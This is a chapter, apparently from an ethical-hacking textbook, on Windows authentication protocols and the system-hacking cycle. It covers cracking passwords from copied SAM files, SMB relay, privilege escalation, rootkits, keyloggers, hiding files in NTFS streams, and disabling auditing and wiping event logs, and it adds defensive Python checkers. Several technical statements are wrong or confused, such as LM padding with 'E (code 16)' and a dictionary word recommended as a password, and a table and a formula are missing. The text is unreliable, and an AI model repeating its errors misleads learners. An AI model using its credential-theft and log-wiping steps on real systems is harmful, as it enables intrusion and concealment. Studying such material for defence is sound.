Figure 8.4: The challenge-response authentication model

Windows Server 2003 supports the following three challenge-response authentication methods:


1. LAN Manager (LM): developed by IBM and Microsoft for use in OS/2 and Windows for Workgroups (Windows 95, Windows 98 and Windows Me). It is the least secure form of challenge-response authentication because it is vulnerable to eavesdropping, and the server authenticating the user must store the credentials as an LM hash.
2. NTLM version 1: a more secure form than LM. It is used to connect to servers running Windows NT with Service Pack 3 or earlier. NTLMv1 uses 56-bit encryption. A server authenticating users with any version of NTLM must store the credentials as an NT hash.
3. NTLM version 2: the most secure form of challenge-response authentication available. This version includes a secure channel protecting the authentication process. It is used to connect to servers running Windows 2000, Windows XP and Windows NT with Service Pack 4 or later. NTLMv2 uses 128-bit encryption to keep the protocol secure.

LM Authentication

LM authentication provides compatibility with earlier operating systems, including Windows 95, Windows 98 and Windows NT 4.0 Service Pack 3 or earlier, and with older applications that may depend on this authentication mechanism. However, the LM protocol is the weakest and the easiest to attack. Do not use LM authentication in a Windows Server 2003 environment; upgrade the computers that rely on LM to remove this vulnerability.

Storing LM passwords

The main reason not to use LM is that when a user creates a password and it is stored for use, the password is converted once into an LM hash. The LM hash holds the user name and the hash of the corresponding password. A hash is a form of one-way encryption. When a client tries to authenticate with LM, the hash of the password is transmitted over the network, and the server can only authenticate the user if it has the LM hash stored. The LM hash has several weaknesses that make it easier to attack than the NT hash: stored LM hashes are upper-case only and limited to 14 characters. A knowledgeable attacker who gains access to the LM hashes of a large number of users is likely to recover their passwords.

Table 8.3: Examples of passwords and the corresponding LM hashes that might be stored

Note that because the password hash is always 14 characters, a shorter password is padded at the end with the character E (code 16). When the hash is computed, the original password is split into two sets of seven characters; if the password is seven characters or fewer, the second set is null. As a result the trailing E characters are a value that tells the attacker the original password was shorter than eight characters, which shortens the time needed to crack it.

Disabling LM passwords

Windows Server 2003 lets you disable LM hashes to remove the weaknesses described above. However, if you have clients running Windows 3.1 or the original release of Windows 95 connecting to a computer running Windows Server 2003, you should not disable LM hashes. You can still disable the use of LM hashes on an account-by-account basis by doing one of the following:

- Use passwords of 15 characters or longer.
- Enable the NoLMHash registry value, locally on a computer or through security policy.
- Use ALT characters in the password. An ALT character is entered into a password by holding down the ALT key, typing digits on the numeric keypad and then releasing ALT.

NTLM Authentication

As mentioned earlier, NTLM comprises three challenge-response authentication methods: LM, NTLMv1 and NTLMv2. The authentication process is the same for all of them; they differ in the level of encryption.

The authentication process

The following steps show the sequence of an authentication event when a client authenticates to a domain controller with any of the NTLM protocols:

Figure 8.5: The NTLM authentication model

1. The client and server negotiate an authentication protocol. This is done through Microsoft's Security Support Provider negotiation. The client sends the user name and domain name to the domain controller.
2. The domain controller picks 16 random bytes to create a string called the nonce.
3. The client encrypts this nonce with the hash of the password and sends it back to the domain controller.
4. The domain controller retrieves the hash of the password from the security account database.
5. The domain controller uses the hash value taken from the security account database to encrypt the nonce. This value is compared with the value received from the client; if the values match, the client is authenticated.

The Kerberos authentication protocol


Kerberos is the default authentication protocol for Windows Server 2003, Windows 2000 and Windows XP Professional. It is designed to be more secure and more scalable than NTLM on large networks. Kerberos provides the following additional benefits:

- Efficiency: when a server needs to authenticate a client, the Kerberos server can validate the client's credentials without having to contact the domain controller.
- Mutual authentication: besides authenticating the client to the server, Kerberos lets the parties authenticate each other.
- Delegated authentication: allows services to impersonate the client when accessing resources.
- Simplified trust management: Kerberos can use trusts between domains in the same forest and domains connected to a forest.
- Interoperability: Kerberos is based on Internet Engineering Task Force (IETF) standards and is therefore compatible with other IETF-compliant Kerberos implementations.

The Kerberos authentication process

The Kerberos protocol takes its idea from the three-headed dog of Greek mythology. The three components of Kerberos are:

1. The clients that request services or authentication.
2. The servers hosting the services the clients request.
3. A computer trusted by both clients and servers (in this case, a Windows Server 2003 domain controller running the Kerberos Key Distribution Center service).

Kerberos authentication is based on specially formatted data packets called tickets. In Kerberos, tickets travel over the network instead of passwords, which makes the authentication process more resistant to attack.

Kerberos Key Distribution Center

The Key Distribution Center (KDC) maintains a database of account information for all security principals in the domain. The KDC stores a cryptographic key known only to each security principal. This key, used for communication between the security principal and the KDC, is known as the long-term key. The long-term key is derived from the user's logon password.

The Kerberos authentication process

What follows is a (simplified) description of a Kerberos exchange, where AS = authentication server, TGS = ticket granting server and SS = service server. In brief: the user authenticates to the authentication server AS, then proves to the ticket granting server TGS that he has been authenticated in order to receive a ticket, and finally proves to the service server SS that he has been approved to use the service.

Figure 8.6: Outline of the Kerberos authentication process

1. The user enters a name and password at his computer (the client).
2. The client software performs a one-way hash on the password it received; the result is used as the user's secret key.
3. The client software sends a packet (in the clear) to the AS requesting a service. The packet essentially says: "user XYZ wants to use a service". Note that neither the secret key nor the password is sent to the AS.
4. The AS checks whether the requester's identity is in its database. If so, the AS sends the following two packets to the user:

- Packet A: the TGS/client session key, encrypted with the user's secret key.
- Packet B: the Ticket Granting Ticket (containing the user's ID, the user's network address, the ticket's validity period and the TGS/client session key), encrypted with the TGS's secret key.

5. On receiving the two packets, the client software decrypts packet A to obtain the session key for the TGS. (The user cannot decrypt packet B because it is encrypted with the TGS's secret key.) At this point the user can authenticate himself to the TGS.
6. When requesting a service, the user sends the following two packets to the TGS:

- Packet C: the Ticket Granting Ticket from packet B and the ID of the requested service.
- Packet D: the authenticator (containing the user's ID and the time of the request), encrypted with the TGS/client session key.

7. On receiving packets C and D, the TGS decrypts D and then sends the following two packets to the user:

- Packet E: the ticket (containing the user's ID, the user's network address, the validity period and the server/client session key), encrypted with the secret key of the server providing the service.
- Packet F: the server/client session key, encrypted with the TGS/client session key.

8. On receiving packets E and F, the user has enough information to authenticate to the service server SS. The client sends SS two packets:

- Packet E obtained in the previous step (containing the server/client session key encrypted with SS's secret key).
- Packet G: a new authenticator, containing the user's ID and the time of the request, encrypted with the server/client session key.

9. SS decrypts the ticket with its own secret key and sends the following packet to the user to confirm its identity and its willingness to provide the service:

- Packet H: the timestamp from the service request packet plus 1, encrypted with the server/client session key.

10. The client decrypts the confirmation packet and checks that the timestamp was updated correctly. If so, the user can trust the server SS and start sending requests to use the service.
11. The server provides the service to the user.

3. Password cracking techniques


Password cracking technology
Many hackers put their effort into cracking passwords. Passwords are the key, the information needed to get into a system. Users, when they create passwords, usually make them hard to guess; yet many passwords are reused, or a single character or some name is chosen so that it is easy to remember. Because of this human factor, a great many passwords have been cracked successfully.

It is the linchpin of privilege escalation, application execution, file hiding and covering tracks. Passwords can be cracked manually or looked up in a dictionary. Manual password cracking means trying to log in with one password after another. The steps a hacker takes are:

1. Find a user account (possibly the administrator or guest account)
2. Build a list of possible passwords
3. Rank the passwords from most to least likely
4. Weigh the importance of each password
5. Keep trying until a password is cracked

Figure 8.7: Steps of manual password cracking

A hacker may try to build a script file with each password in the list, but that is still a manual approach, usually time-consuming and ineffective. To be more effective, a hacker can use tools that hunt for passwords automatically. A more effective way to crack passwords is to get at the password files on the system. Most passwords are stored encrypted on the system: when a user logs in, the password typed is usually encrypted with an algorithm and then compared with the password stored in the file. Rather than guessing, a hacker may try to get into the server, take the file and work on it with those algorithms when the password cannot otherwise be determined. If successful, the hacker can decrypt the passwords stored on the server. Passwords are kept in the SAM file on Windows and in the shadow file on Linux.
Hacking Tools

Here are some password-finding programs. Hackers can guess passwords automatically against NetBIOS-based versions, scanning many IP addresses for systems with shares and usually attacking them with manual tools. NTInfoScan is a security scanner: it scans for all vulnerabilities and produces a report of the security problems found on the host along with other information. L0phtCrack is a password-recovery and auditing package distributed by the company @stake, now owned by Symantec. It intercepts packets on the network and captures individual logon sessions. L0phtCrack includes dictionary and hybrid attack capabilities.

John the Ripper is a command-line tool designed to crack both Unix and NT passwords. It treats passwords as case-sensitive and may fail on mixed-case passwords. Kerbcrack consists of two programs: the kerbsniff sniffer and kerbcrack. The sniffer listens on the Internet connection and captures Windows 2000/XP logon sessions that use Kerberos; the software can then be used to find the passwords in the capture files by attacking them.

Cracking Windows 2000 passwords


Accounts are stored in a file containing user names and encrypted passwords, located under Windows\system32\config. The file is locked while the system is running, so a hacker cannot copy it from a running system. Options for copying it are booting into DOS, booting Linux from a CD, or copying it from the repair directory. If a system administrator has used the RDISK feature of Windows to back up the system, a compressed copy of the file named SAM._ is created in C:\windows\repair. To expand the file, use the following command at the command prompt: C:\>expand sam._ sam. Once the file is uncompressed, dictionary, hybrid or brute-force attacks can be applied to the SAM file.
Hacking Tools

Win32CreateLocalAdminUser is a program that creates a new user with the user name and password X and adds the user to the administrators group. It is a Metasploit project and can be loaded into the Windows .NET Framework libraries. Offline NT Password Resetter is a method for resetting the system administrator's password when the system cannot boot into Windows. Most such methods boot a Linux operating system from CD; since the NTFS partition is not password-protected by the operating system, the password can be changed.

Redirection attack techniques


Another way to discover passwords on the network is to redirect the server's logon, intercepting packets bound for the client so that the password is sent to the hacker instead. To do this the hacker has to send fake authentication responses from the server and trick the victim into the attacker's authentication window. A common technique is to send the victim an e-mail with a deceptive link; when the link is clicked, the user unwittingly sends his credentials over the network.

SMB (Server Message Block) redirection

Several programs can perform the redirection automatically.

- SMBRelay is software that captures the logon name and encrypted password; it can be called the attacker's man-in-the-middle program.
- SMBRelay2 is like SMBRelay but uses the NetBIOS name rather than the IP address to record logon names and passwords.
- pwdump2 is a program that dumps the exact encrypted passwords from the Windows system file; the extracted passwords can then be run through the L0phtCrack password cracker.
- samdump is a program that decrypts encrypted passwords from a SAM file.
- c2MYAZZ is spyware that makes Windows clients send their passwords in clear text. It displays user names and passwords as the users attach to that server's resources.

SMB Relay MITM attacks and countermeasures


In an SMB Relay MITM attack, the attacker sets up a fake server at some address (the relay address). When the victim client connects to the fraudulent server, the MITM server intercepts the session, encrypts the password, and forwards the connection to the target server.

Figure 8.8: SMB relay MITM attack

The countermeasure consists of configuring Windows 2000 to use SMB with encryption of the communications. The setting is found under Security Policies/Security Options.
Hacking Tools

- SMBGrind speeds up the work by removing duplicates and providing utilities so that users do not have to edit by hand.
- SMBDie is a tool that crashes computers running Windows 2000/XP/NT by sending specially crafted SMB requests.
- NBTdeputy is a program that can register a NetBIOS computer name on the network and respond to NetBIOS requests over TCP/IP. Its name resolution is simplified, so SMBRelay can be invoked by computer name instead of IP address.

NetBIOS DoS attacks


A NetBIOS Denial of Service (DoS) attack sends a NetBIOS Name Release message to the NetBIOS Name Service on a target system running Windows; the system is immediately overwhelmed and stops responding to user requests.

It is an attack carried out by sending rejection messages to the host. Tools on the machine can rename it in such an attack. Since the attack comes mainly from the client side, it can build a wide-reaching DoS attack network.
Hacking Tools

NBName is a tool that can disable an entire LAN and keep its machines from rejoining the network. The nodes on a NetBIOS network become infected, and because they share the same network environment they believe their names are already in use by another computer.

4. Countermeasures Against Password Cracking


1. The most important role of a password is to protect. A password must consist of 8-12 letters or digits; password length was discussed in the previous section.
2. To protect the hashing algorithm for the passwords stored on the server, you must be able to isolate and protect the server. The system administrator can use the Syskey utility in Windows to protect the passwords stored on the server's hard disk. The server logs should also be monitored for brute-force attacks on user accounts.
3. A system administrator can apply the following security precautions to reduce the risk to the administrator's and the users' passwords.

Never leave a default password in place.
Never use a password that appears in a dictionary.
Do not use passwords related to the host name, the domain name, or anything else a hacker can easily guess.
Do not use passwords related to your holidays, pets, relatives or birthdays.
Use a word of more than 21 characters from the dictionary as the password.

Password Expiry
When a password expires after a certain period the user is forced to change it. If the expiry period is set too short, the user may forget the current password, and the system administrator ends up resetting passwords frequently. Conversely, if users are allowed to keep a password for too long, security suffers. One recommendation is that passwords be changed about every 30 days. It is also recommended that users not be allowed to reuse any of their last 3 passwords.

Monitoring User Logons
The system administrator must monitor every attempt by hackers to penetrate the system, both before and during an intrusion. In general, several failed attempts are recorded in the system before an intrusion succeeds or a password is broken. How well the logs protect the system depends on the administrator, who must keep watch over the logon process. The VisuaLast search tool helps the network administrator decode and analyse the securely encoded log files. VisuaLast gives the administrator a complete overview and an accurate, efficient assessment. The program lets the administrator view and produce individual reports on logon and logoff activity. It records events accurately on every page and is an invaluable document for security analysts. These events are stored at c:\windows\system32\config\sec.evt; this is the path that holds the attacker's traces.
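As an added illustration of the rules in this section (example code written for this page, not part of the original text or of any product it names), the following Python checker applies the page's password rules: a minimum length, no dictionary words, nothing derived from the host or domain name or from personal details, expiry after 30 days, and no reuse of the last 3 passwords. The small wordlist, the use of 8 as the minimum (the page says 8-12 characters) and the date pattern are assumptions.

```python
import hashlib
import os
import re
from datetime import date, timedelta

# Constructed stand-in for a real cracking wordlist (assumption: a deployment
# would load the same dictionary an attacker's cracker would use).
DICTIONARY = {"password", "welcome", "summer", "dragon", "letmein", "qwerty"}

MIN_LENGTH = 8        # the page asks for 8-12 characters; 8 is used as the minimum here
MAX_AGE_DAYS = 30     # the page's suggested rotation interval
HISTORY_DEPTH = 3     # the page: do not let users reuse their last 3 passwords
DATE_LIKE = re.compile(r"(19|20)\d{2}|\d{2}[/-]\d{2}|\d{6}")   # birthday-style fragments


def _hash(password, salt):
    # History entries are stored salted and hashed, never in clear text.
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)


def policy_violations(candidate, username, hostname, domain, personal_terms=()):
    """Return the list of rules from this section that `candidate` breaks.

    personal_terms: words an attacker could guess about the user (pet names,
    relatives, holiday or birthday fragments).
    """
    problems = []
    low = candidate.lower()
    if len(candidate) < MIN_LENGTH:
        problems.append("shorter than %d characters" % MIN_LENGTH)
    if low in DICTIONARY:
        problems.append("dictionary word")
    for label, term in (("username", username), ("hostname", hostname), ("domain", domain)):
        # compare against the first label of a FQDN, e.g. "corp" from "corp.example"
        if term and term.lower().split(".")[0] in low:
            problems.append("contains the %s" % label)
    for term in personal_terms:
        if term.lower() in low:
            problems.append("contains personal information (%s)" % term)
    if DATE_LIKE.search(candidate):
        problems.append("contains a date-like number")
    return problems


class PasswordHistory:
    """Tracks the salted hashes of the last HISTORY_DEPTH passwords of one account."""

    def __init__(self):
        self.entries = []          # (salt, hash, date_set), oldest first

    def is_reused(self, candidate):
        return any(_hash(candidate, salt) == digest for salt, digest, _ in self.entries)

    def expired(self, today):
        # No password yet counts as expired so that a first password must be set.
        if not self.entries:
            return True
        return today - self.entries[-1][2] > timedelta(days=MAX_AGE_DAYS)

    def change(self, candidate, today, **context):
        """Apply every rule; store the password only if it passes all of them."""
        problems = policy_violations(candidate, **context)
        if self.is_reused(candidate):
            problems.append("one of the last %d passwords" % HISTORY_DEPTH)
        if not problems:
            salt = os.urandom(16)
            self.entries.append((salt, _hash(candidate, salt), today))
            self.entries = self.entries[-HISTORY_DEPTH:]
        return problems
```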

Part 2: Escalating Privileges


Escalating Privileges (Privilege Escalation Technique)
Privilege escalation is the third step in the System Hacking cycle. Escalating privileges basically means adding more rights or permissions to a user account; it turns an ordinary user account into one with the rights of an administrator account. In general, administrator accounts have stricter password requirements and their passwords are guarded more closely. If the hacker cannot find the user name and password of an account with administrator rights, they may choose to use an account with lower privileges. In that case the hacker must then escalate those privileges until they equal an administrator's. This is done by gaining access with a non-administrator user account, usually by collecting user names and passwords through an intermediate step that raises the account's privileges to administrator level. Once the hacker has a valid user account and password, the next step is to execute applications; in general the hacker needs an account with administrator-level access to install programs. That is why privilege escalation is so important. In the following sections we will look at what a hacker can do to your system once they hold administrator rights.
Hacking Tools

Getadmin.exe is a small program that can add a user to the Local Administrators group. It uses a low-level NT kernel routine, commonly accessible, that allows the process to run. A logon at the server console is required to run the program. Getadmin.exe runs from the command line and only works on Windows NT 4.0 Service Pack 3. The HK.exe utility exposes a flaw in the Local Procedure Call (LPC) mechanism of Windows NT. A user who is not an administrator can escalate into the administrators group by using this tool.

Part 3: Executing Applications

Once the hacker has access to an account with administrator rights, the next thing to do is execute applications on the target system. The purpose of executing applications may be to install a backdoor on the system, install a keylogger to gather confidential information, copy files, or simply cause damage to the system; whatever the hacker wants to do on it. Once the hacker can execute applications, the system is under the hacker's control.
Hacking tools

PsExec is a program that connects to a remote system and executes files on it. The software does not need to be installed on the remote system. Remoxec executes a program using the RPC service (Task Scheduler) or WMI (Windows Management Instrumentation). Administrators with blank or weak passwords can be exploited through the Task Scheduler (1025/tcp) or the Distributed Component Object Model (DCOM; 135/tcp).

1. Buffer Overflows
The hacker tries to exploit a flaw in the application code. In essence, a buffer overflow attack sends too much information into a particular variable in the application, which can cause the application to fail. Most of the time the application does not know what to do next because it has been overwritten with the overflowed data, so it either executes the commands contained in the overflowed data or drops into a command prompt that lets the user enter the next command. That command prompt (or shell) is the key the hacker can use to execute other applications. Buffer overflows are discussed in detail in Chapter 19: Buffer Overflows.

2. Rootkits

Rootkits: spyware. A rootkit is a type of program commonly used to hide utilities on a compromised system. Rootkits include what are called back doors, which make it easier for the attacker to get back into the system the next time. For example, a rootkit may hide an application that spawns a command connection on a specific network port of the system. The back door allows processes started by an unprivileged user to perform functions normally reserved for administrators. Rootkits are frequently used so that the rootkit's author can view and access user names and logon information on the sites that require them. The term site here does not mean a website but a domain within a system of computers. Some common kinds of rootkit:

Kernel-level rootkits: these usually add to or replace parts of the operating system kernel with modified code that helps hide a program on the computer. This is usually done by adding new code to the kernel through a mechanism that can load modules, such as loadable kernel modules in Linux or device drivers in Microsoft Windows. Such rootkits are especially dangerous because they can be hard to detect without suitable software.
Library-level rootkits: these commonly intercept, patch, or replace system calls. Some versions can hide information depending on the hacker's purpose.
Application-level rootkits: these may replace ordinary application programs with malicious trojan versions, or change the behaviour of existing applications using hooks, patches, injected code, or other means. The following sections discuss how a rootkit infects a system.

Deploying Rootkits on Windows 2000 & XP


On Windows NT/2000 the rootkit is built as a kernel-mode device driver that can be loaded dynamically at run time. The rootkit runs with system privileges in the NT kernel, so it has access to all the resources of the operating system. The rootkit can also hide processes, hide files, hide registry entries, intercept keystrokes on the system console, issue a debug interrupt to cause a blue screen of death, and redirect EXE files. This rootkit contains a kernel-mode device driver named _root_.sys and a launcher program named DEPLOY.EXE. After gaining access to the system, the attacker copies _root_.sys and DEPLOY.EXE onto it and runs DEPLOY.EXE. This installs the rootkit device driver, after which the attacker deletes DEPLOY.EXE from the target computer. The attacker can then stop and restart the rootkit with the commands net stop _root_ and net start _root_, and the _root_.sys file no longer appears in directory listings: the rootkit blocks the system from returning the file in listings and hides every file whose name begins with _root_. The operating system has two modes of operation, user mode and kernel mode. In kernel mode, programs have full access to RAM and to the CPU's instructions; in short, full control.

Rootkit Embedded in the TCP/IP Protocol


A new feature of the rootkit on Windows NT/2000 is that it works by determining the connection state from the data in incoming packets. The rootkit has a fixed IP address that it answers on. The rootkit uses Ethernet connections through the system's network card, which makes it very powerful: a hacker can connect to any port on the system. It also lets several people log in at the same time.

Rootkit Countermeasures


All rootkits access the system with the same rights as the administrator, so password security is very important. If you detect a rootkit, the advice is to back up the important data and reinstall the operating system and applications from a trusted source. Administrators should also keep a trusted source ready for installation and automated recovery. Another countermeasure is to use the MD5 hashing algorithm: the MD5 checksum of a file is a 128-bit value, like a fingerprint of the file. The algorithm is designed to detect any change, however small, in the data of a file, whatever the cause. This makes it very useful for comparing files and ensuring their integrity. A nice property is that the checksum has a fixed length regardless of the size of the source file. MD5 checksums that verify a file has not changed are useful for checking file integrity if a rootkit is found on the system. Tools such as Tripwire perform MD5 checks to determine whether files have been affected by a rootkit.
Countermeasure Tools

Tripwire is a file-system integrity checker for Unix and Linux operating systems that, in addition, computes a cryptographic checksum of the contents of one or more directories and files. Tripwire has a database of information that also lets you verify access permissions and file mode settings, the file owner's user name, the date and time the file was last accessed, and its last modification.
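To show the checksum-based integrity check described above in working form, here is an added Python example (written for this page; it is not Tripwire's code) that records, per file, the attributes the text lists for Tripwire, then compares a later snapshot against that baseline. The directory layout, file contents and the replacement of a system binary by a same-size trojaned copy are a constructed scenario; MD5 is used because the text discusses it, and the `algo` parameter accepts any hashlib algorithm.

```python
import hashlib
import stat
import tempfile
from pathlib import Path


def file_digest(path, algo="md5", chunk=65536):
    """Fixed-length fingerprint of the file contents, as the text describes for MD5."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def snapshot(root, algo="md5"):
    """Record, for every file under root, the attributes the text lists for Tripwire:
    content checksum, size, permission mode, owner and last-modification time."""
    root = Path(root)
    db = {}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        st = path.stat()
        db[path.relative_to(root).as_posix()] = {
            "digest": file_digest(path, algo),
            "size": st.st_size,
            "mode": stat.S_IMODE(st.st_mode),
            "uid": st.st_uid,
            "mtime": int(st.st_mtime),
        }
    return db


def compare(baseline, current):
    """Report files added, removed, or whose recorded attributes changed."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = {}
    for name in sorted(set(baseline) & set(current)):
        changed = [k for k in baseline[name] if baseline[name][k] != current[name][k]]
        if changed:
            modified[name] = changed
    return {"added": added, "removed": removed, "modified": modified}


def demo():
    """Constructed scenario: take a baseline, then simulate a rootkit that replaces a
    system binary, drops its driver and adds a root-equivalent account, and show
    that the comparison catches all three."""
    with tempfile.TemporaryDirectory() as root:
        r = Path(root)
        (r / "bin").mkdir()
        (r / "bin" / "ls").write_bytes(b"original ls binary")
        (r / "etc").mkdir()
        (r / "etc" / "passwd").write_bytes(b"root:x:0:0:root:/root:/bin/sh\n")
        baseline = snapshot(r)          # in practice stored on read-only, offline media

        # Same byte length as the original, so a size-only check would miss it.
        (r / "bin" / "ls").write_bytes(b"trojaned ls binary")
        (r / "bin" / "_root_.sys").write_bytes(b"rootkit driver")   # name taken from the text
        (r / "etc" / "passwd").write_bytes(
            b"root:x:0:0:root:/root:/bin/sh\ntoor:x:0:0::/:/bin/sh\n")

        return compare(baseline, snapshot(r))
```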

3. Keyloggers and Other Spyware


If every attempt to gather passwords fails, a keylogger is the hacker's tool of choice. It is implemented either as software installed on the computer or as hardware attached to it. Keyloggers are hidden pieces of software that sit between the hardware (the keyboard) and the operating system so that they can record every keystroke. Software keyloggers can compromise a system like trojans or viruses. A keylogger is a small piece of spyware that hooks the computer's keyboard and stores every keystroke in a file. The hacker can add a feature that automatically sends the file's contents to the hacker's server.

With a hardware keylogger, a device resembling a USB stick is attached to the computer and the keystrokes are recorded on it. To do this the hacker must have physical access to the system. Hardware keyloggers are often planted at poorly secured public Internet access points, so when you go online in a public place you should look carefully for unusual devices plugged into the computer.
Hacking Tools

Spector is spyware that records everything a system does on the Internet, like an automatic surveillance camera. Spector takes hundreds of snapshots per hour of whatever is on the computer screen and saves them in a hidden location on the system's hard disk. Spector can be detected and removed with anti-Spector software. eBlaster is Internet spyware that captures incoming and outgoing email and immediately forwards it to an email address. eBlaster can also capture both sides of an Instant Messenger conversation, log keystrokes, and record frequently visited websites. SpyAnywhere is a tool that lets you view system activity and user actions, shut down or restart the machine, lock or freeze the system, and even browse its file system remotely. SpyAnywhere lets you control programs and windows on the remote system and view its Internet history and related information. KKeylogger is a high-performance spyware program with a virtual device driver that runs silently at the lowest level of Windows 95/98/ME. All keystrokes are recorded in a file. Email keylogger is software that records all email sent and received on a system. The hacker's goal is to see the sender, recipient, subject, and date/time; the email body and any attachments are recorded as well.

Part 4: Hiding Files


A hacker may want to hide files on a system to avoid detection, so that they can later be used to launch another attack on the system. There are two ways to hide files in Windows. The first is to use the attrib command. To hide a file with the attrib command, type the following at the command prompt: attrib +h [file/directory]

The second way to hide a file in Windows is with NTFS alternate data streams (ADS).

1. NTFS File Streaming


NTFS, used by Windows NT, 2000 and XP, has a feature called ADS that allows data to be stored in hidden files that are linked to a normal, visible file. Streams are not limited in size, and more than one stream can be linked to a normal file. To create and test an NTFS file stream, carry out the following steps:

1. At the command line, type notepad test.txt.
2. Put some data in the file, save the file, and close Notepad.
3. At the command line, type dir test.txt and note the file size.
4. At the command line, type notepad test.txt:hidden.txt. Type some text into Notepad, save the file, and close it.
5. Check the file size again (as in step 3).
6. Open test.txt again. You see only the original data.
7. Type type test.txt:hidden.txt at the command line. An error message is displayed: The filename, directory name, or volume label syntax is incorrect.

Hacking Tools

Makestrm.exe is a utility that moves the data of a file into an ADS linked to that file, replacing the original file's contents with the link.

NTFS File Streaming Countermeasures

To remove a stream from a file, first copy the file to a FAT partition and then copy it back to the NTFS partition. The stream is lost when the file is moved to the FAT partition, because streams are a feature of NTFS and therefore only exist on an NTFS partition.
Countermeasure Tools

You can use LNS.exe to detect streams. LNS reports the existence and location of files that contain stream data.

2. Steganography Technologies

Steganography is the process of hiding data inside other kinds of data, such as images or text files. The most common method of hiding data in files is to use a graphic image as the hiding place. The attacker can embed information in an image file using steganography. Hackers can hide instructions for making a bomb, a secret bank account number, or any other action inside an image. For JPEG image files, an algorithm called the Discrete Cosine Transform (DCT) encodes, compresses, and embeds the hidden data in the file. The algorithm is computed with the following formula:

Hacking Tools

1. Imagehide is a steganography program that hides large amounts of text in images. Even after the data is added there is no increase in the image size, and the image looks the same as in an ordinary graphics program. It loads and saves files and can therefore evade sniffing.
2. Blindside is a steganography application that hides information inside BMP (bitmap) images. It is a command-line utility.
3. MP3Stego hides information in MP3 files during the compression process. The data is compressed, encrypted, and hidden in the MP3 bit stream.
4. Snow is a whitespace steganography program: it hides a message in ASCII text by appending whitespace to the end of lines. Because spaces and tabs are not visible to a reader of the text, the message is concealed; if an encryption algorithm is used as well, the message cannot be read even if it is detected.
5. Camera/Shy works with Windows and the Internet Explorer browser and lets users share censored or sensitive information stored inside an ordinary GIF image.
6. Stealth is a filtering tool for PGP files. It strips the identifying information from the header, after which the file can be used for steganography.

Countering Steganography
Steganography can be detected by some programs, although doing so is difficult. The first step in detection is to locate the files containing hidden text, which can be done by analysing patterns in the images and changes in the colour palette.
Countermeasure Tools

Stegdetect is an automated tool for detecting steganographic content in images. Dskprobe is a tool on the Windows 2000 installation CD. It is a low-level hard-disk scanner that can detect steganography.

Part 5: Cover Your Tracks & Erase Evidence


Cover Your Tracks & Erase Evidence: concealing information and removing traces. Once an intruder has succeeded in gaining administrator access to a system, they try to cover their tracks to avoid detection. A hacker may also try to remove the evidence of their activity on the system to prevent tracing the hacker's identity or location. Any error messages or security events that have been logged are removed to avoid detection. In the following sections we look at disabling auditing and clearing the event log, the two methods hackers use to cover their tracks and avoid detection. Auditing is the feature that writes the Event Log; Windows Event Viewer is the program used to manage auditing on Windows.

1. Disabling Auditing
The first thing an intruder does after gaining administrator rights is to disable auditing. Auditing in Windows records certain events in the Windows Event Viewer. Events can include a logon to the system, an application, or other events. An administrator can choose the level of logging on the system. The hacker needs to determine the logging level to see whether they need to do anything to clear their traces from the system.
Hacking tools

auditpol is a tool included in the Windows NT resource kit for system administrators. It can disable or enable auditing from the command line. It can also be used to determine the logging level set by the system administrator.

2. Clearing the Event Log
Intruders can easily wipe the security logs in Windows Event Viewer. An event log that contains only one or a few events is suspicious, because it usually indicates that the other events have been cleared. It is still necessary to clear the event log after turning off auditing, because using the AuditPol tool leaves an event recording that auditing was turned off.
Hacking Tools

Several tools wipe the event log, or a hacker can do it by hand in Windows Event Viewer. The elsave.exe utility is a simple tool for clearing the event log. Winzapper is a tool an attacker can use to selectively delete event records from the Windows 2000 security log. Winzapper also ensures that no security events are logged while the program is running. Evidence Eliminator is a data-wiping program for Windows computers. It prevents data from remaining as permanently hidden files on the system. It cleans the recycle bin, the Internet cache, system files, temp folders and so on. Evidence Eliminator can also be used by a hacker to remove evidence from a system after an attack.
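From the defender's side, the two actions just described leave their own traces, and the text's rule that a nearly empty log is itself suspicious can be automated. The following added Python example (written for this page, not code from any of the tools named) scans a constructed export of a security log, forwarded to a central collector so that the entries survive a wipe on the host, for audit-policy changes and log-clearing events. The event IDs are assumptions taken from Windows documentation rather than from the text, and the event threshold is an arbitrary choice.

```python
import csv
from datetime import datetime
from io import StringIO

# Event IDs of the two anti-forensic actions described in the text. The numbers are
# from Windows documentation, not from the text: 517 / 1102 = "the audit log was
# cleared" (NT-2003 / Vista and later), 612 / 4719 = "audit policy changed".
LOG_CLEARED = {"517", "1102"}
AUDIT_POLICY_CHANGED = {"612", "4719"}
MIN_EXPECTED_EVENTS = 50   # assumption: a busy server's log holding fewer is suspicious

# Constructed export of a security log as forwarded to a central collector; the
# other event IDs are ordinary logon records and carry no meaning for the checks.
SAMPLE_EXPORT = """time,event_id,user,message
2024-03-01 08:00:12,528,alice,Successful logon
2024-03-01 08:05:40,528,bob,Successful logon
2024-03-01 12:14:03,612,bob,Audit policy change: success/failure auditing turned off
2024-03-01 12:15:10,517,bob,The audit log was cleared
2024-03-01 12:15:31,528,bob,Successful logon
"""


def parse_export(text):
    """Turn the CSV export into dicts, with the timestamp parsed for ordering."""
    rows = list(csv.DictReader(StringIO(text)))
    for row in rows:
        row["time"] = datetime.strptime(row["time"], "%Y-%m-%d %H:%M:%S")
    return rows


def anti_forensic_events(rows):
    """Return (time, description) for every cover-your-tracks action in the export,
    in the order the events occurred."""
    alerts = []
    for row in sorted(rows, key=lambda r: r["time"]):
        if row["event_id"] in LOG_CLEARED:
            alerts.append((row["time"], "security log cleared by %s" % row["user"]))
        elif row["event_id"] in AUDIT_POLICY_CHANGED:
            alerts.append((row["time"], "audit policy changed by %s" % row["user"]))
    return alerts


def suspect_accounts(rows):
    """Accounts that performed any of the actions above; these need investigation."""
    return {r["user"] for r in rows if r["event_id"] in LOG_CLEARED | AUDIT_POLICY_CHANGED}


def looks_wiped(rows, expected=MIN_EXPECTED_EVENTS):
    """The text's rule: a log holding only one or a few events usually means the rest
    were deleted."""
    return len(rows) < expected
```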

Summary
